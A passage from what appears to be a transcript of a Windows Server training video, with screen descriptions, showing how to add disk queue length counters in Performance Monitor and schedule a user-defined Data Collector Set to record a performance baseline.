adds it over on the right [to the Added counters section.] and I'll click OK. [The dialog box closes and the
screen goes back to the Performance Monitor window.] And now it's been added down here, [The average
Disk Queue Length for the available physical disks are now listed in the table along with the percent
Processor Time.] we've got the average disk queue length, in total, but also we've got the individual disk
queue lengths. For the total one, I'm going to double-click on it, [The Performance Monitor Properties dialog
box opens. It includes various tabs such as General and Data. The Data tab is selected by default. It includes
drop-down list boxes for Color, Scale, Width, and Style. There are also three buttons at the bottom of the
dialog box, namely OK, Cancel, and Apply.] where I can change things like the color and the width of that
specific line as it gets written to the graph. [He changes the color and width of the graph line from their
respective drop-down lists.] And we can see it listed here now a little bit more clearly at the bottom. Naturally,
as we have more disk I/O activity, we can expect that thick green bar for the average disk queue length in total
to start spiking periodically. And just because you've got a spike in a graph doesn't mean that there's
necessarily a problem.
It means, perhaps, that the server is simply doing its job, it's dealing with file I/O for instance. So, again, you
need a baseline of normal activity for your particular environment before a lot of this becomes truly
meaningful and useful to make decisions from. Speaking of making decisions and establishing baselines, over
here on the left, if I go into Data Collector Sets, [He expands the Data Collector Sets folder from the
navigation pane. It displays various subfolders such as User Defined and System.] I could build a custom,
user-defined data collector set. So I could right-click here and choose New > Data Collector Set. [The Create
new Data Collector Set wizard opens. It includes a Name textbox and two radio buttons, Create from a
template (Recommended) and Create manually (Advanced). It also has three buttons at the bottom: Next,
Finish, and Cancel.] Maybe I'll call this Establish Baseline, because what I could do is gather performance
metrics over time on this particular host, although it could be counters from remote hosts over the network. So
I'm going to choose Create manually here, and I'll click Next. [The next page of the wizard contains two radio
buttons, Create data logs and Performance Counter Alert. The Create data logs radio button has three
checkboxes listed under it, namely Performance counter, Event trace data, and System configuration
information.] And what I want to do here is work with performance counters, so I'll turn on the check box for
performance counter, and I'll click Next. [The next page of the wizard includes a Performance counters field
and two buttons, Add and Remove. It also has a spin box for Sample interval and a drop-down list box for
Units.] Then I click Add to choose the specific performance counters from the local, or even remote
computers. [The Add Counters dialog box opens.] So we have options related to that, and I'm going to scroll down to, again, the P's, the Physical Disk section. And just for consistency, maybe we'll choose the average disk
queue length here, and I'll add it for all instances, I'll click Add, and OK. And I'm going to have that sampled,
let's say every 15 minutes, and I'll click Next, I'll accept the defaults. And on the last screen, though, what I do
want to do is open up the properties for the data collector set. So I have to turn that option on, and then I'll
click Finish. [The wizard closes and the EST Baseline Properties dialog box opens. It includes various tabs
such as General, Security, and Schedule.] I want that option because here I can go to the Schedule tab, where I
can add a schedule, [He clicks the Add button at the bottom of the Schedule tab. A Folder Action dialog box
opens.] in terms of when I want this data collector set to begin gathering information, on which days of the
week and so on.
So maybe I'll have it start, let's see here, on the following Monday, September 19th. And I'll have it expire,
maybe, at the end of that week, September 23rd. So I have five business days worth of working data, and then
I'll click OK. [The dialog box closes.] So then I'll be able to see reports down here, [He expands the reports
folder in the navigation pane.] for example, for user defined items like Establish Baseline, over time, once it's
gathered that information and the schedule has kicked in. Now of course, aside from Performance Monitor,
which I'll close, we can also go into the good old Task Manager. So, one of the ways I can do that, of course, is
to search for it. So I'm going to search for Task Manager here in my Start menu, I'm g